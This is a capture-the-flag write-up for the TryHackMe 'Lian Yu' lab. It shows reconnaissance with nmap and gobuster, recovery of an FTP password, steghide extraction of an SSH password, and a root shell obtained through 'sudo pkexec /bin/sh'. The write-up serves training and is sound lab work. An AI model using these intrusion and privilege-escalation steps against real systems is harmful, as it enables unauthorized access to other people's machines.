Introduction
Hey, folks with you volk in this writeup we are going to solve and explain Lian Yu Challenge on TryHackMe.
The difficulty of challenge is a beginner-level challenge.
Tools Used
Enumeration
First, I Scanned the target using Nmap to know the open ports, OS, Version, etc… by the following command:
nmap -A [Machine_IP]
-A: OS detection, Script Scanning, Version detection, and traceroute
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey:
| 1024 56:50:bd:11:ef:d4:ac:56:32:c3:ee:73:3e:de:87:f4 (DSA)
| 2048 39:6f:3a:9c:b6:2d:ad:0c:d8:6d:be:77:13:07:25:d6 (RSA)
| 256 a6:69:96:d7:6d:61:27:96:7e:bb:9f:83:60:1b:52:12 (ECDSA)
|_ 256 3f:43:76:75:a8:5a:a6:cd:33:b0:66:42:04:91:fe:a0 (ED25519)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Purgatory
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 35098/udp status
| 100024 1 55094/tcp status
| 100024 1 58104/tcp6 status
|_ 100024 1 59600/udp6 status
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
I tried to access the FTP port using the username and password of anonymous but it didn’t allow me, So I
decided to check port 80 (HTTP)
nothing important even in the source code so let’s try to brute force the hidden directories using Gobuster by
typing :
gobuster dir -u http://10.10.166.42 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
dir: use directory brute force
-u: to specify the target URL
-w: to specify the path of the wordlist you wanna use
that’s the result:
===============================================================
[+] Url: http://10.10.166.42
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
/island (Status: 301) [Size: 235] [--> http://10.10.166.42/island/]
So I found a directory called island
then I checked the source code
<p>You should find a way to <b> Lian_Yu</b> as we are planed. The Code Word is: </p><h2 style="color:white"> vigilante</h2>
As you can see at the end of the code the word vigilante is some kind of hidden, we will use this word later but
lets now try to gobuster island directory
gobuster dir -u http://10.10.166.42/island -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
[+] Url: http://10.10.166.42/island
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
/2100 (Status: 301) [Size: 240] [--> http://10.10.166.42/island/2100/]
I found this directory /2100 and by founding this directory we solved the first question
I went to http://[Machine_IP]/island/2100
Nothing intersting so i decided to check the source code
<!DOCTYPE html>
<html>
<body>
<h1 align=center>How Oliver Queen finds his way to Lian_Yu?</h1>
<p align=center >
<iframe width="640" height="480" src="https://www.youtube.com/embed/X8ZiFuW41yY">
</iframe> <p>
<!-- you can avail your .ticket here but how? -->
</header>
</body>
</html>
There is a comment in the source code that is giving us a hint that there is a filename and its extension is .ticket
so let’s try to gobuster name of the file and its extension .ticket, so I will use -x to brute force directory /2100
and at the end of the file, the extension will be .ticket.
gobuster dir -u http://10.10.166.42/island -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .ticket
===============================================================
[+] Url: http://10.10.132.83/island/2100/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: ticket
[+] Timeout: 10s
===============================================================
/green_arrow.ticket (Status: 200) [Size: 71]
We got the file name and by founding this file we answered the second question
When I accessed the file I found the encoded password
RTy8yhBQdscX
So I tried to use many tools to analyze the has until I found Good Website which is tunnels up
and I knew that it is base64 but when I went to Cyberchef and tried to decode it from base64 I got nothing
so I tried all the types of bases until I got the password by decoding it with base58
Gaining Access
Now Lets access FTP by the username that was hidden (Vigilante) and the decoded password
Connected to 10.10.124.174.
220 (vsFTPd 3.0.2)
Name (10.10.124.174:kali): vigilante
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
Login Successful, now let’s list the files and download it
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 1001 1001 4096 May 05 2020 .
drwxr-xr-x 4 0 0 4096 May 01 2020 ..
-rw------- 1 1001 1001 44 May 01 2020 .bash_history
-rw-r--r-- 1 1001 1001 220 May 01 2020 .bash_logout
-rw-r--r-- 1 1001 1001 3515 May 01 2020 .bashrc
-rw-r--r-- 1 0 0 2483 May 01 2020 .other_user
-rw-r--r-- 1 1001 1001 675 May 01 2020 .profile
-rw-r--r-- 1 0 0 511720 May 01 2020 Leave_me_alone.png
-rw-r--r-- 1 0 0 549924 May 05 2020 Queen's_Gambit.png
-rw-r--r-- 1 0 0 191026 May 01 2020 aa.jpg
226 Directory send OK.
ftp> get .other_user
ftp> get Queen's_Gambit.png
ftp> get aa.jpg
ftp> get Leave_me_alone.png
We downloaded all the intersting files successfull, now lets try to move the directory back one directory
ftp> cd ..
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 4 0 0 4096 May 01 2020 .
drwxr-xr-x 23 0 0 4096 Apr 30 2020 ..
drwx------ 2 1000 1000 4096 May 01 2020 slade
drwxr-xr-x 2 1001 1001 4096 May 05 2020 vigilante
226 Directory send OK.
Analyzing the Files
As you can see we got another username and this information can be used later, For now, let’s analyze the files
we found when I read the .other_user file I didn’t find anything helpful but the username Slade. and I tried to use
ExifTool with the images but I didn’t get any useful information, If we tried to open the Leave_me_alone.png file
we will get an error and the reason of this error is the wrong signature of the file
$ steghide extract -sf aa.jpg
Enter passphrase: password
wrote extracted data to "ss.zip".
$ unzip ss.zip
Archive: ss.zip
inflating: passwd.txt
inflating: shado
$ cat passwd.txt
This is your visa to Land on Lian_Yu # Just for Fun ***
a small Note about it
Having spent years on the island, Oliver learned how to be resourceful and
set booby traps all over the island in the common event he ran into dangerous
people. The island is also home to many animals, including pheasants,
wild pigs and wolves.
$ cat shado
M3tahuman
SSH.
$ ssh slade@10.10.120.240
slade@10.10.120.240's password: M3tahuman
Way To SSH...
Loading.........Done..
Connecting To Lian_Yu Happy Hacking
██╗ ██╗███████╗██╗ ██████╗ ██████╗ ███╗ ███╗███████╗██████╗
██║ ██║██╔════╝██║ ██╔════╝██╔═══██╗████╗ ████║██╔════╝╚════██╗
██║ █╗ ██║█████╗ ██║ ██║ ██║ ██║██╔████╔██║█████╗ █████╔╝
██║███╗██║██╔══╝ ██║ ██║ ██║ ██║██║╚██╔╝██║██╔══╝ ██╔═══╝
╚███╔███╔╝███████╗███████╗╚██████╗╚██████╔╝██║ ╚═╝ ██║███████╗███████╗
╚══╝╚══╝ ╚══════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚══════╝
██╗ ██╗ █████╗ ███╗ ██╗ ██╗ ██╗██╗ ██╗
██║ ██║██╔══██╗████╗ ██║ ╚██╗ ██╔╝██║ ██║
██║ ██║███████║██╔██╗ ██║ ╚████╔╝ ██║ ██║
██║ ██║██╔══██║██║╚██╗██║ ╚██╔╝ ██║ ██║
███████╗██║██║ ██║██║ ╚████║███████╗██║ ╚██████╔╝
╚══════╝╚═╝╚═╝ ╚═╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═════╝ #
slade@LianYu:~$ cat user.txt
THM{Root_Flag}
Privilege Escalation
lets try sudo -l to see the command that can be executed by this user (slade) as root
slade@LianYu:~$ sudo -l
[sudo] password for slade:
Matching Defaults entries for slade on LianYu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User slade may run the following commands on LianYu:
(root) PASSWD: /usr/bin/pkexec
Nice, We can run Pkexec with root privileges now let’s go to GTFOBins and search for pkexec
sudo pkexec /bin/sh
Lets execute the above command to escalates to root privileges
slade@LianYu:~$ sudo pkexec /bin/sh
# ls
root.txt
# cat root.txt
Mission accomplished
You are injected me with Mirakuru:) ---> Now slade Will become DEATHSTROKE.
THM{Root_Flag}
--DEATHSTROKE
And we got the Root flag :), Thanks For reading the writeup see you in the next writeup